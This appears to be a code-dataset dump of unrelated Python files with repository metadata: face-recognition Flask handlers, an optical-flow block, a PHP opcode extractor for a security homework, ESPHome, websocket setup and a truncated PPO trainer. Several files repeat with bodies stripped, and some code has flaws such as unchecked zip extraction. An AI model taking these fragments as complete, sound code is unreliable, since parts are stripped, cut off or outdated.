    ensure_folder(STATIC_DIR)
    ensure_folder(UPLOAD_DIR)
    file1 = request.files['file1']
    # secure_filename sanitizes user-supplied names before joining paths
    fn_1 = secure_filename(file1.filename)
    full_path_1 = os.path.join(UPLOAD_DIR, fn_1)
    file1.save(full_path_1)
    resize(full_path_1)
    file2 = request.files['file2']
    fn_2 = secure_filename(file2.filename)
    full_path_2 = os.path.join(UPLOAD_DIR, fn_2)
    file2.save(full_path_2)
    resize(full_path_2)
    prob, is_same = compare(full_path_1, full_path_2)
    elapsed = time.time() - start
    return is_same, prob, elapsed, fn_1, fn_2
def face_detect(full_path):
    """Detect all faces in the image at full_path and annotate the file
    in place when at least one face is found.

    Returns (num_faces, elapsed_seconds, bboxes, landmarks).
    """
    start = time.time()
    img = Image.open(full_path).convert('RGB')
    bboxes, landmarks = detect_faces(img)
    num_faces = len(bboxes)
    if num_faces > 0:
        # Re-read with OpenCV for drawing, then overwrite the original file
        img = cv.imread(full_path)
        draw_bboxes(img, bboxes, landmarks)
        cv.imwrite(full_path, img)
    elapsed = time.time() - start
    return num_faces, float(elapsed), bboxes, landmarks
def face_search():
    """Flask handler body: save the uploaded image ('file') into
    UPLOAD_DIR, resize it, and look up the closest celebrity via search().

    Returns (name, prob, gallery_file, uploaded_path, elapsed_seconds).
    Must be called inside a Flask request context.
    """
    start = time.time()
    ensure_folder(STATIC_DIR)
    ensure_folder(UPLOAD_DIR)
    file = request.files['file']
    filename = secure_filename(file.filename)
    filename = filename.lower()
    # NOTE(review): this compares the WHOLE filename against extensions --
    # it only triggers when secure_filename reduced a name like ".jpg" to
    # "jpg". Presumably meant to rescue extension-only names; confirm.
    # randint(0, 101) also leaves a collision chance between uploads.
    if filename in ['jpg', 'jpeg', 'png', 'gif']:
        filename = str(random.randint(0, 101)) + '.' + filename
    file_upload = os.path.join(UPLOAD_DIR, filename)
    file.save(file_upload)
    resize(file_upload)
    logger.info('file_upload: ' + file_upload)
    name, prob, file_star = search(file_upload)
    elapsed = time.time() - start
    return name, prob, file_star, file_upload, float(elapsed)
def face_feature():
    """Flask handler body: save the uploaded image ('file') into
    UPLOAD_DIR, resize it, and return its face embedding.

    Returns (feature_vector, uploaded_path, elapsed_seconds).
    Must be called inside a Flask request context.
    """
    start = time.time()
    ensure_folder(STATIC_DIR)
    ensure_folder(UPLOAD_DIR)
    file = request.files['file']
    filename = secure_filename(file.filename)
    filename = filename.lower()
    # Same extension-only rescue / collision caveat as face_search --
    # see the NOTE(review) there.
    if filename in ['jpg', 'jpeg', 'png', 'gif']:
        filename = str(random.randint(0, 101)) + '.' + filename
    file_upload = os.path.join(UPLOAD_DIR, filename)
    file.save(file_upload)
    resize(file_upload)
    logger.info('file_upload: ' + file_upload)
    feature = get_feature(file_upload)
    elapsed = time.time() - start
    return feature, file_upload, float(elapsed)
def extract(filename, folder_path):
    """Extract the zip archive at filename into folder_path, then delete
    the archive (best effort).

    filename: path to a .zip file.
    folder_path: destination directory (created by extractall as needed).
    """
    # Context manager guarantees the archive handle is closed even if
    # extractall raises (previously the handle leaked on error).
    with zipfile.ZipFile(filename, 'r') as zip_ref:
        zip_ref.extractall(folder_path)
    logger.info('files extracted to: {}'.format(folder_path))
    # Removing the archive is best-effort; ignore filesystem errors
    try:
        os.remove(filename)
    except OSError:
        pass
class ArcFaceDataset(Dataset):
    """Torch Dataset yielding (original, mirrored) preprocessed face
    tensors for each image filename under folder_path.

    Items raise FaceNotFoundError (via get_image_batch) when an image
    contains no detectable face.
    """

    def __init__(self, files, folder_path):
        # files: image filenames relative to folder_path
        self.files = files
        self.folder_path = folder_path

    def __getitem__(self, i):
        filepath = self.files[i]
        filepath = os.path.join(self.folder_path, filepath)
        # draw=False: never overwrite dataset images with annotations
        img_0, img_1 = get_image_batch(filepath, draw=False)
        return img_0, img_1

    def __len__(self):
        return len(self.files)
def face_feature_batch(full_path=''):
    """Compute flip-augmented embeddings for every face image in a zip.

    full_path: path to a .zip archive; it is extracted into a unique
        static/batch/<timestamp>_<rand> folder which is deleted again at
        the end. Non-zip input leaves the work folder empty/missing, so
        os.listdir below would fail -- callers should pass a zip.

    Returns (feature_dict, elapsed_seconds) where feature_dict maps
    filename -> unit-norm embedding as a python list.

    NOTE(review): FaceNotFoundError from get_image_batch is NOT caught in
    the batching loop; a face passing the pre-filter but failing central
    detection would abort the whole batch -- confirm acceptable.
    """
    start = time.time()
    folder_path = 'static/batch'
    # Unique per-call working directory so concurrent batches don't collide
    rand = random.randint(1000, 9999)
    subdir = datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S')
    subdir = '{}_{}'.format(subdir, rand)
    folder_path = os.path.join(folder_path, subdir)
    shutil.rmtree(folder_path, ignore_errors=True)
    if full_path.lower().endswith('.zip'):
        extract(full_path, folder_path)
    files = [f for f in os.listdir(folder_path)]
    logger.info('file count: {}, start filtering...'.format(len(files)))
    # Pre-filter: keep only files that open as images AND contain a face.
    # NOTE: full_path (the parameter) is shadowed/reused inside this loop.
    filtered = []
    for filename in tqdm(files):
        full_path = os.path.join(folder_path, filename)
        try:
            img = Image.open(full_path).convert('RGB')
            bounding_boxes, landmarks = detect_faces(img)
            if len(bounding_boxes) > 0:
                filtered.append(filename)
        except ValueError:
            pass
        except OSError:
            pass
    files = filtered
    file_count = len(files)
    logger.info('filtered file count: {}, start processing...'.format(len(files)))
    batch_size = 256
    feature_dict = dict()
    with torch.no_grad():
        for start_idx in tqdm(range(0, file_count, batch_size)):
            end_idx = min(file_count, start_idx + batch_size)
            length = end_idx - start_idx
            # Two aligned batches: originals and their horizontal mirrors
            imgs_0 = torch.zeros([length, 3, 112, 112], dtype=torch.float, device=device)
            imgs_1 = torch.zeros([length, 3, 112, 112], dtype=torch.float, device=device)
            for idx in range(0, length):
                i = start_idx + idx
                filepath = files[i]
                filepath = os.path.join(folder_path, filepath)
                imgs_0[idx], imgs_1[idx] = get_image_batch(filepath, draw=False)
            features_0 = model(imgs_0.to(device)).cpu().numpy()
            features_1 = model(imgs_1.to(device)).cpu().numpy()
            for idx in range(0, length):
                i = start_idx + idx
                # Sum original+mirror features, then L2-normalize
                feature = features_0[idx] + features_1[idx]
                feature = feature / np.linalg.norm(feature)
                feature_dict[files[i]] = feature.tolist()
    # logger.info('images processed')
    elapsed = time.time() - start
    if file_count > 0:
        elapsed_per_image = elapsed / file_count
        times.update(elapsed_per_image, file_count)
    # Clean up the per-call working directory
    shutil.rmtree(folder_path, ignore_errors=True)
    logger.info('batch({}) done: {:.4f}({:.4f}) seconds per image.'.format(len(files), times.val, times.avg))
    return feature_dict, elapsed
if __name__ == "__main__":
    # Manual smoke test: compare an ID-card photo against four live photos
    # (results are only logged, not asserted).
    compare('id_card.jpg', 'photo_1.jpg')
    compare('id_card.jpg', 'photo_2.jpg')
    compare('id_card.jpg', 'photo_3.jpg')
    compare('id_card.jpg', 'photo_4.jpg')
| 10,954 | 2 | 543 |
64f5c80b80caea8f767009f87333b4de2d60eb43 | 2,344 | py | Python | reip/blocks/video/effects.py | reip-project/reip-pipelines | c6a8341e963b73f6fd08d63513876590e5af3d62 | [
"BSD-3-Clause-Clear"
] | null | null | null | reip/blocks/video/effects.py | reip-project/reip-pipelines | c6a8341e963b73f6fd08d63513876590e5af3d62 | [
"BSD-3-Clause-Clear"
] | null | null | null | reip/blocks/video/effects.py | reip-project/reip-pipelines | c6a8341e963b73f6fd08d63513876590e5af3d62 | [
"BSD-3-Clause-Clear"
] | null | null | null | import numpy as np
import cv2
import reip
class OpticalFlow(reip.Block):
    '''
    https://opencv-python-tutroals.readthedocs.io/en/latest/py_tutorials/py_video/py_lucas_kanade/py_lucas_kanade.html#dense-optical-flow-in-opencv
    '''
    # Lazily-allocated HSV buffer used to render the flow field as an image.
    hsv = None
    # Previous grayscale frame; dense flow is computed between it and the
    # current frame.
    _prev = None

    # Default Farneback parameters, kept here for quick reference:
    # pyr_scale=0.5, levels=3, winsize=15, iterations=3,
    # poly_n=5, poly_sigma=1.2, flags=0
import cv2
import reip
class OpticalFlow(reip.Block):
    '''
    https://opencv-python-tutroals.readthedocs.io/en/latest/py_tutorials/py_video/py_lucas_kanade/py_lucas_kanade.html#dense-optical-flow-in-opencv

    Dense (Farneback) optical flow block with two outputs:
      0: the raw flow in polar form, a ``(magnitude, angle)`` pair;
      1: an optional HSV visualization blended over the input frame
         (``None`` when drawing is disabled).
    The first frame only primes the state and produces no output.
    '''
    # Lazily-allocated HSV buffer used to render the flow field as an image.
    hsv = None
    # Previous grayscale frame; flow is computed between it and the current one.
    _prev = None

    # Default Farneback parameters, for reference:
    # pyr_scale=0.5, levels=3, winsize=15, iterations=3,
    # poly_n=5, poly_sigma=1.2, flags=0
    def __init__(self, pyr_scale=0.5, levels=3, winsize=15, iterations=3,
                 poly_n=5, poly_sigma=1.2, flags=0, resize=(256, 256), draw_mag_scale=10, draw=None, **kw):
        # Farneback algorithm parameters (passed straight to OpenCV).
        self.pyr_scale = pyr_scale
        self.levels = levels
        self.winsize = winsize
        self.iterations = iterations
        self.poly_n = poly_n
        self.poly_sigma = poly_sigma
        self.flags = flags
        # Frames are downscaled to this (w, h) before flow computation;
        # falsy value disables resizing.
        self.resize = resize
        # None means "auto": decide at init() time from whether output 1
        # has any readers attached.
        self._should_draw = draw
        # Multiplier applied to flow magnitude when rendering the V channel.
        self.draw_mag_scale = draw_mag_scale
        super().__init__(n_outputs=2, **kw)

    def init(self):
        # Auto-enable drawing only if someone is reading the visualization sink.
        self.should_draw = bool(self.sinks[1].readers) if self._should_draw is None else self._should_draw
        self.log.debug(f'will draw: {self.should_draw}')

    def process(self, frame, meta):
        # `frame` is assumed to be a BGR image (cv2.COLOR_BGR2GRAY below)
        # -- TODO confirm expected dtype/range against upstream blocks.
        original = frame
        if self.resize:
            frame = cv2.resize(frame, self.resize)
        current = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY).astype('uint8')
        if self.hsv is None:
            # First frame: allocate the visualization buffer (full saturation),
            # remember the frame, and emit nothing.
            self.hsv = np.zeros_like(frame)
            self.hsv[..., 1] = 255
            self._prev = current
            return
        flow = cv2.calcOpticalFlowFarneback(
            self._prev, current, None, self.pyr_scale, self.levels, self.winsize,
            self.iterations, self.poly_n, self.poly_sigma, self.flags)
        self._prev = current
        # Convert (dx, dy) to (magnitude, angle) per pixel.
        flow = cv2.cartToPolar(flow[..., 0], flow[..., 1])
        return [flow, self.draw(original, flow) if self.should_draw else None], {}

    def draw(self, im, flow, mix=0.5):
        # Render flow as HSV: hue = direction, value = (scaled) magnitude.
        mag, ang = flow
        # OpenCV hue range is 0..180, angle is in radians.
        self.hsv[..., 0] = ang * 180 / np.pi / 2
        # self.hsv[..., 2] = cv2.normalize(mag, None, 0, 255, cv2.NORM_MINMAX)
        self.hsv[..., 2] = np.clip(mag*self.draw_mag_scale, 0, 255)
        flow = cv2.cvtColor(self.hsv, cv2.COLOR_HSV2BGR)
        # Upscale the visualization back to the original frame size if needed.
        if im.shape != flow.shape:
            flow = cv2.resize(flow, im.shape[:2][::-1])
        # Alpha-blend the flow image over the original frame.
        im = im * (1-mix) + flow * mix
        # Returned as float32 in [0, 1] (assumes `im` was 0..255 -- TODO confirm).
        return (im/255).astype('float32')
ea34fd7e600804241350bd0344bbe8d8d9dd67f3 | 1,409 | py | Python | Homework/2019/Task7/4/Code/filter_opcode.py | ohhuola/Data-Mining-for-Cybersecurity | 7c04b2519810970227777fc1a1a29bb87d47a41e | [
"MIT"
] | null | null | null | Homework/2019/Task7/4/Code/filter_opcode.py | ohhuola/Data-Mining-for-Cybersecurity | 7c04b2519810970227777fc1a1a29bb87d47a41e | [
"MIT"
] | null | null | null | Homework/2019/Task7/4/Code/filter_opcode.py | ohhuola/Data-Mining-for-Cybersecurity | 7c04b2519810970227777fc1a1a29bb87d47a41e | [
"MIT"
] | null | null | null | import re
import subprocess
import os
from tqdm import tqdm
| 29.354167 | 97 | 0.53868 | import re
import subprocess
import os
from tqdm import tqdm
def php_to_opcode(phpfilename):
    """Run ``php`` with the vld extension on *phpfilename* and return its
    opcode sequence as a single space-separated string.

    Returns the sentinel ``" "`` (a single space) when the file cannot be
    processed (php/vld missing, non-zero exit status, unreadable file, ...);
    callers use that sentinel to count and skip failed samples.
    """
    try:
        # vld.active=1 dumps the compiled opcodes; vld.execute=0 stops the
        # script from actually running. A non-zero exit status raises
        # subprocess.CalledProcessError, handled below.
        output = subprocess.check_output(
            ['php', '-dvld.active=1', '-dvld.execute=0', phpfilename], stderr=subprocess.STDOUT)
        output = str(output, encoding='utf-8')
        # Opcode mnemonics appear as upper-case words surrounded by whitespace.
        tokens = re.findall(r'\s(\b[A-Z_]+\b)\s', output)
        t = " ".join(tokens)
        # Drop the first 6 characters of the joined string (presumably a
        # fixed leading token from vld's banner -- TODO confirm).
        t = t[6:]
        return t
    # Was a bare `except:`; narrowed so KeyboardInterrupt/SystemExit still
    # propagate instead of being silently converted into the sentinel.
    except Exception:
        print(
            "\n[-]Warning: something happend when execute vld to get opcode:" + str(phpfilename))
        return " "
def trans(path):
    """Convert *path* (a single ``.php`` file, or a directory tree of them)
    into vld opcode strings.

    Returns a tuple ``(opcodes, converted, failed)`` where *opcodes* is the
    list of opcode strings, *converted* counts files successfully converted
    in directory mode, and *failed* counts files vld could not process.
    Returns ``([], 0, 0)`` when *path* does not exist.
    Note: for the single-file case the counters stay 0, matching the
    original behavior.
    """
    # Idiomatic existence check (was `== False`).
    if not os.path.exists(path):
        print('\n[-]Warning: path does not exist, do nothing')
        return [], 0, 0
    result = []
    converted = 0
    failed = 0
    if os.path.isfile(path):
        result.append(php_to_opcode(path))
    elif os.path.isdir(path):
        # Walk the whole tree; tqdm renders one progress bar per directory.
        for dirpath, dirnames, filenames in os.walk(path):
            for single_file in tqdm(filenames, desc=dirpath, ncols=100):
                if '.php' in single_file:
                    fullpath = os.path.join(dirpath, single_file)
                    single_result = php_to_opcode(fullpath)
                    if single_result == " ":
                        # " " is php_to_opcode's failure sentinel.
                        failed += 1
                        continue
                    result.append(single_result)
                    converted += 1
    return result, converted, failed
7ae8c7f7b52099998030d4155daa298e682c086a | 630 | py | Python | Assignment Solution/Module5-master/Module5_CaseStudy1_Q2_Ans.py | krdhakal/Edureka-HW-Solutions-of-Data-Science-for-Python-Certification | 2332839d25cca3ee8036d6dda7360a3b31824d6b | [
"MIT"
] | null | null | null | Assignment Solution/Module5-master/Module5_CaseStudy1_Q2_Ans.py | krdhakal/Edureka-HW-Solutions-of-Data-Science-for-Python-Certification | 2332839d25cca3ee8036d6dda7360a3b31824d6b | [
"MIT"
] | null | null | null | Assignment Solution/Module5-master/Module5_CaseStudy1_Q2_Ans.py | krdhakal/Edureka-HW-Solutions-of-Data-Science-for-Python-Certification | 2332839d25cca3ee8036d6dda7360a3b31824d6b | [
"MIT"
] | null | null | null | # Find the genre in which there has been the greatest number of movie releases
import pandas as pd
import numpy as np
dataset=pd.read_csv('c:\\temp\\HollywoodMovies.csv')
selected_data=dataset.loc[:,['WorldGross','Genre']]
df=pd.DataFrame(selected_data)
df_notnull_genre=df[df.Genre.notnull()]
df_notnull_worldgross=df_notnull_genre[df_notnull_genre.WorldGross.notnull()]
df_final= df_notnull_worldgross
Series_genre = df_final['WorldGross'].groupby(df_final['Genre']).sum()
df_new=pd.DataFrame(Series_genre)
genre=df_new.sort_values(by='WorldGross', ascending=False).head(10) #finding top 10 genre movies released
print genre
| 39.375 | 106 | 0.803175 | # Find the genre in which there has been the greatest number of movie releases
import pandas as pd
import numpy as np
dataset=pd.read_csv('c:\\temp\\HollywoodMovies.csv')
selected_data=dataset.loc[:,['WorldGross','Genre']]
df=pd.DataFrame(selected_data)
df_notnull_genre=df[df.Genre.notnull()]
df_notnull_worldgross=df_notnull_genre[df_notnull_genre.WorldGross.notnull()]
df_final= df_notnull_worldgross
Series_genre = df_final['WorldGross'].groupby(df_final['Genre']).sum()
df_new=pd.DataFrame(Series_genre)
genre=df_new.sort_values(by='WorldGross', ascending=False).head(10) #finding top 10 genre movies released
print genre
| 0 | 0 | 0 |
a943368dd77b94ada6edbbab0c76bd8593bd383e | 634 | py | Python | esphome/components/homeassistant/binary_sensor/__init__.py | OttoWinter/esphomeyaml | 6a85259e4d6d1b0a0f819688b8e555efcb99ecb0 | [
"MIT"
] | 249 | 2018-04-07T12:04:11.000Z | 2019-01-25T01:11:34.000Z | esphome/components/homeassistant/binary_sensor/__init__.py | OttoWinter/esphomeyaml | 6a85259e4d6d1b0a0f819688b8e555efcb99ecb0 | [
"MIT"
] | 243 | 2018-04-11T16:37:11.000Z | 2019-01-25T16:50:37.000Z | esphome/components/homeassistant/binary_sensor/__init__.py | OttoWinter/esphomeyaml | 6a85259e4d6d1b0a0f819688b8e555efcb99ecb0 | [
"MIT"
] | 40 | 2018-04-10T05:50:14.000Z | 2019-01-25T15:20:36.000Z | import esphome.codegen as cg
from esphome.components import binary_sensor
from .. import (
HOME_ASSISTANT_IMPORT_SCHEMA,
homeassistant_ns,
setup_home_assistant_entity,
)
DEPENDENCIES = ["api"]
HomeassistantBinarySensor = homeassistant_ns.class_(
"HomeassistantBinarySensor", binary_sensor.BinarySensor, cg.Component
)
CONFIG_SCHEMA = binary_sensor.binary_sensor_schema(HomeassistantBinarySensor).extend(
HOME_ASSISTANT_IMPORT_SCHEMA
)
| 25.36 | 85 | 0.801262 | import esphome.codegen as cg
from esphome.components import binary_sensor
from .. import (
HOME_ASSISTANT_IMPORT_SCHEMA,
homeassistant_ns,
setup_home_assistant_entity,
)
# This platform needs the native API component to pull state from Home Assistant.
DEPENDENCIES = ["api"]
# C++ class generated for this platform (declared in the homeassistant namespace).
HomeassistantBinarySensor = homeassistant_ns.class_(
    "HomeassistantBinarySensor", binary_sensor.BinarySensor, cg.Component
)
# Standard binary-sensor schema plus the shared Home Assistant import options
# (entity id, etc.).
CONFIG_SCHEMA = binary_sensor.binary_sensor_schema(HomeassistantBinarySensor).extend(
    HOME_ASSISTANT_IMPORT_SCHEMA
)
async def to_code(config):
    """Generate the C++ setup code for one imported HA binary sensor.

    Creates the sensor variable, registers it as a component, and wires up
    the Home Assistant entity id from *config*.
    """
    var = await binary_sensor.new_binary_sensor(config)
    await cg.register_component(var, config)
    setup_home_assistant_entity(var, config)
| 151 | 0 | 23 |
89089996ae8b20945ecd282a5d4e36d1c88f9623 | 658 | py | Python | Programming/python/cookbook/n_base_conversion.py | kwangjunechoi7/TIL | 99403791eb77fd9190d7d6f60ade67bb48122b33 | [
"MIT"
] | null | null | null | Programming/python/cookbook/n_base_conversion.py | kwangjunechoi7/TIL | 99403791eb77fd9190d7d6f60ade67bb48122b33 | [
"MIT"
] | null | null | null | Programming/python/cookbook/n_base_conversion.py | kwangjunechoi7/TIL | 99403791eb77fd9190d7d6f60ade67bb48122b33 | [
"MIT"
] | null | null | null | # -*-coding:utf-8-*-
"""
์ง๋ฒ ๋ณํ recursive ์๊ณ ๋ฆฌ์ฆ
2 <= n <= 16๊น์ง ๊ฐ๋ฅ
"""
"""
def test(n,t):
answer = ''
while t//n >= 1:
re = t%n
t = t//n
answer = str(re) + answer
print(answer)
if t < n:
answer = str(t) + answer
return int(answer)
"""
"""
# ์ง๋ฒ ๋ณํ ํจ์ ์ฌ๋์
def convert_2(t, n):
s = 'ABCDEF'
a = ''
while t:
if t%n > 9:
a = s[t%n -10] + a
else:
a = str(t%n) + a
t = t//n
return a
""" | 16.04878 | 36 | 0.410334 | # -*-coding:utf-8-*-
"""
์ง๋ฒ ๋ณํ recursive ์๊ณ ๋ฆฌ์ฆ
2 <= n <= 16๊น์ง ๊ฐ๋ฅ
"""
def convert(n,t):
    """Return the non-negative integer *n* written in base *t* (2 <= t <= 16),
    using the digits 0-9 and A-F."""
    digits = "0123456789ABCDEF"
    out = []
    # Peel off the least-significant digit until the quotient reaches zero;
    # digits come out in reverse order.
    while True:
        n, r = divmod(n, t)
        out.append(digits[r])
        if n == 0:
            break
    return "".join(reversed(out))
"""
def test(n,t):
answer = ''
while t//n >= 1:
re = t%n
t = t//n
answer = str(re) + answer
print(answer)
if t < n:
answer = str(t) + answer
return int(answer)
"""
"""
# ์ง๋ฒ ๋ณํ ํจ์ ์ฌ๋์
def convert_2(t, n):
s = 'ABCDEF'
a = ''
while t:
if t%n > 9:
a = s[t%n -10] + a
else:
a = str(t%n) + a
t = t//n
return a
""" | 126 | 0 | 23 |
893bf952793b1d79a10262685f8eb26e6c8e37fa | 391 | py | Python | src/opera/parser/tosca/v_1_3/policy_definition.py | sstanovnik/xopera-opera | 06031d37268913c6ba6dbc30ec6b4acb3a17dc5a | [
"Apache-2.0"
] | null | null | null | src/opera/parser/tosca/v_1_3/policy_definition.py | sstanovnik/xopera-opera | 06031d37268913c6ba6dbc30ec6b4acb3a17dc5a | [
"Apache-2.0"
] | null | null | null | src/opera/parser/tosca/v_1_3/policy_definition.py | sstanovnik/xopera-opera | 06031d37268913c6ba6dbc30ec6b4acb3a17dc5a | [
"Apache-2.0"
] | null | null | null | from ..entity import Entity
from ..map import Map
from ..reference import Reference
from ..string import String
from ..void import Void
| 23 | 44 | 0.657289 | from ..entity import Entity
from ..map import Map
from ..reference import Reference
from ..string import String
from ..void import Void
class PolicyDefinition(Entity):
    """Parser entity for a TOSCA (v1.3) policy definition.

    Declares the recognized attributes: a mandatory policy type reference
    plus optional description, metadata, and properties.
    """
    ATTRS = dict(
        # Must name a type declared under `policy_types`.
        type=Reference("policy_types"),
        description=String,
        metadata=Map(String),
        # Property values are kept opaque (Void) at parse time.
        properties=Map(Void),
        # TODO(@tadeboro): targets, triggers
    )
    # `type` is the only required key.
    REQUIRED = {"type"}
| 0 | 231 | 23 |
c33f07b92a9ea6c9b5d80e72c591cec5aeaf2a35 | 2,591 | py | Python | setup.py | Robert-96/websocket-client | fd56fd35d2a933745814afd23253a33d71306bb9 | [
"Apache-2.0"
] | 1 | 2022-03-25T09:03:23.000Z | 2022-03-25T09:03:23.000Z | setup.py | Robert-96/websocket-client | fd56fd35d2a933745814afd23253a33d71306bb9 | [
"Apache-2.0"
] | null | null | null | setup.py | Robert-96/websocket-client | fd56fd35d2a933745814afd23253a33d71306bb9 | [
"Apache-2.0"
] | null | null | null | import sys
import pkg_resources
from setuptools import setup, find_packages
"""
setup.py
websocket - WebSocket client library for Python
Copyright 2022 engn33r
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Package version, also exposed on PyPI.
VERSION = "1.3.1"

# Runtime has no hard dependencies; optional extras are declared below.
install_requires = []
tests_require = []

setup(
    name="websocket-client",
    version=VERSION,
    description="WebSocket client for Python with low level API options",
    # README.md doubles as the PyPI long description.
    long_description=open("README.md").read(),
    long_description_content_type='text/markdown',
    author="liris",
    author_email="liris.pp@gmail.com",
    license="Apache-2.0",
    url="https://github.com/websocket-client/websocket-client.git",
    download_url='https://github.com/websocket-client/websocket-client/releases',
    python_requires='>=3.7',
    # Optional dependency groups: test runner deps, speedups/proxy support,
    # and docs tooling.
    extras_require={
        "test": ["websockets"],
        "optional": ["python-socks", "wsaccel"],
        "docs": ["Sphinx >= 3.4", "sphinx_rtd_theme >= 0.5"],
    },
    classifiers=[
        "Development Status :: 4 - Beta",
        "License :: OSI Approved :: Apache Software License",
        "Programming Language :: Python :: 3",
        "Programming Language :: Python :: 3.7",
        "Programming Language :: Python :: 3.8",
        "Programming Language :: Python :: 3.9",
        "Programming Language :: Python :: 3.10",
        "Operating System :: MacOS :: MacOS X",
        "Operating System :: POSIX",
        "Operating System :: Microsoft :: Windows",
        "Topic :: Internet",
        "Topic :: Software Development :: Libraries :: Python Modules",
        "Intended Audience :: Developers",
    ],
    project_urls={
        'Documentation': 'https://websocket-client.readthedocs.io/',
        'Source': 'https://github.com/websocket-client/websocket-client/',
    },
    keywords='websockets client',
    # Installs the `wsdump` debugging CLI.
    entry_points={
        'console_scripts': [
            'wsdump=websocket._wsdump:main',
        ],
    },
    install_requires=install_requires,
    packages=find_packages(),
    # Ship the test fixture files with the package.
    package_data={
        'websocket.tests': ['data/*.txt']
    },
    tests_require=tests_require,
    test_suite="websocket.tests"
)
| 32.797468 | 81 | 0.661521 | import sys
import pkg_resources
from setuptools import setup, find_packages
"""
setup.py
websocket - WebSocket client library for Python
Copyright 2022 engn33r
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
VERSION = "1.3.1"
install_requires = []
tests_require = []
setup(
name="websocket-client",
version=VERSION,
description="WebSocket client for Python with low level API options",
long_description=open("README.md").read(),
long_description_content_type='text/markdown',
author="liris",
author_email="liris.pp@gmail.com",
license="Apache-2.0",
url="https://github.com/websocket-client/websocket-client.git",
download_url='https://github.com/websocket-client/websocket-client/releases',
python_requires='>=3.7',
extras_require={
"test": ["websockets"],
"optional": ["python-socks", "wsaccel"],
"docs": ["Sphinx >= 3.4", "sphinx_rtd_theme >= 0.5"],
},
classifiers=[
"Development Status :: 4 - Beta",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Operating System :: MacOS :: MacOS X",
"Operating System :: POSIX",
"Operating System :: Microsoft :: Windows",
"Topic :: Internet",
"Topic :: Software Development :: Libraries :: Python Modules",
"Intended Audience :: Developers",
],
project_urls={
'Documentation': 'https://websocket-client.readthedocs.io/',
'Source': 'https://github.com/websocket-client/websocket-client/',
},
keywords='websockets client',
entry_points={
'console_scripts': [
'wsdump=websocket._wsdump:main',
],
},
install_requires=install_requires,
packages=find_packages(),
package_data={
'websocket.tests': ['data/*.txt']
},
tests_require=tests_require,
test_suite="websocket.tests"
)
| 0 | 0 | 0 |
c656d81b7ac6d0b7d7e2fea232113d472dda5096 | 10,112 | py | Python | on_policy/algorithms/ppo.py | marsXyr/RL_Pytorch | cc80bfb442c45c8e87849a7d0a1fb8bc837448a5 | [
"MIT"
] | null | null | null | on_policy/algorithms/ppo.py | marsXyr/RL_Pytorch | cc80bfb442c45c8e87849a7d0a1fb8bc837448a5 | [
"MIT"
] | null | null | null | on_policy/algorithms/ppo.py | marsXyr/RL_Pytorch | cc80bfb442c45c8e87849a7d0a1fb8bc837448a5 | [
"MIT"
] | null | null | null | import numpy as np
import argparse, gym, time, os
import os.path as osp
import torch
import torch.nn as nn
import torch.optim as optim
from on_policy.utils import core
from on_policy.utils.model import ActorCritic
from on_policy.utils.replay_buffer import ReplayBuffer
from utils.logx import EpochLogger
from utils.run_utils import setup_logger_kwargs
from utils.mpi_tools import mpi_fork, num_procs, mpi_avg, proc_id
if __name__ == '__main__':
parser = argparse.ArgumentParser()
""" env """
parser.add_argument('--env', type=str, default='HalfCheetah-v2')
parser.add_argument('--epochs', type=int, default=50)
parser.add_argument('--steps_per_epoch', type=int, default=4000)
parser.add_argument('--max_ep_len', type=int, default=1000)
parser.add_argument('--train_pi_iters', type=int,default=80)
parser.add_argument('--train_v_iters', type=int, default=80)
parser.add_argument('--save_freq', type=int, default=5)
""" algorithm """
parser.add_argument('--gamma', type=float, default=0.99)
parser.add_argument('--lam', type=float, default=0.95)
parser.add_argument('--clip_ratio', type=float, default=0.2)
parser.add_argument('--target_kl', type=float, default=0.01)
parser.add_argument('--actor_lr', type=float, default=1e-4)
parser.add_argument('--critic_lr', type=float, default=1e-3)
""" others """
parser.add_argument('--seed', '-s', type=int, default=0)
parser.add_argument('--exp_name', type=str, default='ppo')
parser.add_argument('--cpu', type=int, default=2)
args = parser.parse_args()
# run parallel code with mpi
mpi_fork(args.cpu)
logger_kwargs = setup_logger_kwargs(args.exp_name, args.seed)
# Save model path
fpath = osp.join(logger_kwargs['output_dir'], 'models')
ppo = PPO()
ppo.run()
| 42.666667 | 122 | 0.601563 | import numpy as np
import argparse, gym, time, os
import os.path as osp
import torch
import torch.nn as nn
import torch.optim as optim
from on_policy.utils import core
from on_policy.utils.model import ActorCritic
from on_policy.utils.replay_buffer import ReplayBuffer
from utils.logx import EpochLogger
from utils.run_utils import setup_logger_kwargs
from utils.mpi_tools import mpi_fork, num_procs, mpi_avg, proc_id
class PPO:
    """Proximal Policy Optimization (clipped-objective variant) trainer.

    Builds a gym environment, an actor-critic network and a GAE replay
    buffer, then alternates on-policy rollout collection with clipped PPO
    policy updates and value-function regression. Runs data-parallel over
    MPI processes (gradients and KL are averaged across ranks).

    Relies on module-level globals set up in __main__: `args` (CLI options),
    `logger_kwargs` (logger config) and `fpath` (model save directory).
    """
    def __init__(self):
        # train env, which is used in train process
        self.env = gym.make(args.env).unwrapped
        # env information
        self.state_space = self.env.observation_space
        self.action_space = self.env.action_space
        self.state_dim = self.state_space.shape[0]
        self._init_parameters()
        self._init_nets()
        # Buffer sized for one epoch of this process's rollouts (GAE with
        # gamma/lambda).
        self.replay_buffer = ReplayBuffer(self.local_steps_per_epoch, self.state_space.shape, self.action_space.shape,
                                          self.gamma, self.lam)
        # set random seed
        # Offset the seed per MPI rank so workers explore differently.
        seed = args.seed + 10000 * proc_id()
        self.env.seed(seed)
        np.random.seed(seed)
        torch.manual_seed(seed)

    def _init_parameters(self):
